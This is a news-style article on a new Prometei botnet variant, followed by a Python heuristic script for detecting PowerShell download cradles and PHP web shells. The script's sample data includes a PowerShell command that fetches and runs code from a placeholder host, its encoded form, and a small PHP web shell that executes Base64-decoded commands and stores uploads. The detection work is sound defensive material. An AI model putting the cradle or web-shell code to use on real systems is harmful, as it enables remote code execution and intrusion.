Since November of last year, the Prometei botnet's developers have been distributing its latest version, which has infected over 10,000 systems globally. Based on reports, the current campaign does not target a specific region, but most of its victims have been in Indonesia, Turkey, and Brazil.
Researchers first spotted Prometei nearly a decade ago. It is a modular botnet with numerous components and infection methods, and one of its best-known capabilities is the exploitation of the ProxyLogon vulnerability in Microsoft Exchange Server.
Some experts claimed that the operators are based in Russia, since that country has yet to experience an attack from the threat group that uses the botnet.
Prometei botnet campaigns are primarily for financial purposes and cryptocurrency mining.
According to investigations, the cross-platform Prometei botnet malware runs a financially motivated campaign that leverages infected hosts to collect credentials and mine cryptocurrency.
Moreover, the new variant complicates forensic analysis, since its features were improved to address the weaknesses of its past versions. This improved botnet can also reach more locations within a targeted machine.
Researchers explained that, after gaining initial access, the threat actors execute a PowerShell command that downloads the botnet malware from a remote server.
Subsequently, the botnet operators use the Prometei botnet's introductory module to retrieve the actual cryptocurrency-mining payload and the other components used in the attack on the targeted system.
Several support modules within the botnet act as spreaders, designed by the malware authors to propagate the payload via Secure Shell (SSH), Server Message Block (SMB), and Remote Desktop Protocol (RDP).
The third version of the Prometei botnet can also use a domain generation algorithm to construct the domain names of its command-and-control server. Furthermore, it packs a self-update feature and an expanded set of commands for harvesting confidential data and manipulating the host.
Finally, the malware launches an Apache web server with a PHP-based web shell that can execute Base64-encoded commands and accept file uploads.
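As an added illustration of the two host-side artifacts described above (the PowerShell download command run at initial access, and the PHP web shell that executes Base64-encoded commands and accepts uploads), the following Python script is a detection heuristic written for this article; it is not code from the researchers, the vendor, or the botnet itself. Every sample command line and PHP file below is constructed, and the host names, the 203.0.113.10 address, and the file paths are placeholders. The patterns are generic download-cradle and web-shell signatures, not Prometei-specific indicators.

```python
import base64
import re
from typing import Dict, List

# --- PowerShell side: download cradles and encoded commands (generic heuristics) ---
CRADLE_PATTERNS = [
    re.compile(r"downloadstring\s*\(", re.I),
    re.compile(r"downloadfile\s*\(", re.I),
    re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I),
    re.compile(r"\bstart-bitstransfer\b", re.I),
]
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob (PowerShell decodes it as UTF-16LE)
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload if present, otherwise an empty string."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify_powershell(cmdline: str) -> Dict[str, object]:
    """Flag a process command line that fetches code from a remote server, even when encoded."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + " " + decoded          # inspect both the raw and the decoded form
    hits = [p.pattern for p in CRADLE_PATTERNS if p.search(text)]
    return {"suspicious": bool(hits), "encoded": bool(decoded), "decoded": decoded, "hits": hits}


# --- PHP side: web-shell constructs (generic heuristics) ---
_EXEC = r"\b(?:eval|system|exec|shell_exec|passthru|popen|proc_open|assert)"
WEBSHELL_PATTERNS = [
    re.compile(_EXEC + r"\s*\(\s*base64_decode\s*\(", re.I),          # exec of a Base64-decoded string
    re.compile(_EXEC + r"\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),  # exec of raw request input
    re.compile(r"\bmove_uploaded_file\s*\(", re.I),                   # arbitrary file upload handler
]


def classify_php(source: str) -> Dict[str, object]:
    """Flag PHP source that executes decoded or request-supplied input or stores uploads."""
    hits = [p.pattern for p in WEBSHELL_PATTERNS if p.search(source)]
    return {"suspicious": bool(hits), "hits": hits}


def scan(process_events: List[Dict[str, str]], php_files: Dict[str, str]) -> List[Dict[str, object]]:
    """Run both heuristics and return one finding per suspicious event or file."""
    findings: List[Dict[str, object]] = []
    for ev in process_events:
        r = classify_powershell(ev["cmdline"])
        if r["suspicious"]:
            findings.append({"type": "powershell_cradle", "host": ev["host"], **r})
    for path, src in php_files.items():
        r = classify_php(src)
        if r["suspicious"]:
            findings.append({"type": "php_webshell", "path": path, **r})
    return findings


# --- Constructed sample telemetry (placeholders, not real Prometei artifacts) ---
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
SAMPLE_PROCESS_EVENTS = [
    {"host": "ws-01", "cmdline": f'powershell.exe -nop -w hidden -c "{_CRADLE}"'},
    {"host": "ws-02", "cmdline": "powershell.exe -EncodedCommand "
                                 + base64.b64encode(_CRADLE.encode("utf-16le")).decode()},
    {"host": "ws-03", "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]
SAMPLE_PHP_FILES = {
    "/var/www/html/hello.php": "<?php echo htmlspecialchars($_GET['name']); ?>",
    "/var/www/html/uploads/x.php": (
        "<?php if(isset($_POST['c'])){ system(base64_decode($_POST['c'])); }"
        " if(isset($_FILES['f'])){ move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']); } ?>"
    ),
}

if __name__ == "__main__":
    for f in scan(SAMPLE_PROCESS_EVENTS, SAMPLE_PHP_FILES):
        print(f)
```

The encoded-command branch matters because a plain string match on the raw command line misses the second sample entirely; decoding the UTF-16LE Base64 blob first lets the same cradle patterns fire on both forms. The PHP patterns are deliberately narrow so a benign page that merely reads `$_GET` is not flagged, while the combination of an execution function with decoded or request-supplied input, or an upload handler, is.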
Cybersecurity experts warn that this latest iteration of the Prometei botnet carries numerous improvements and capabilities compared to its earlier versions.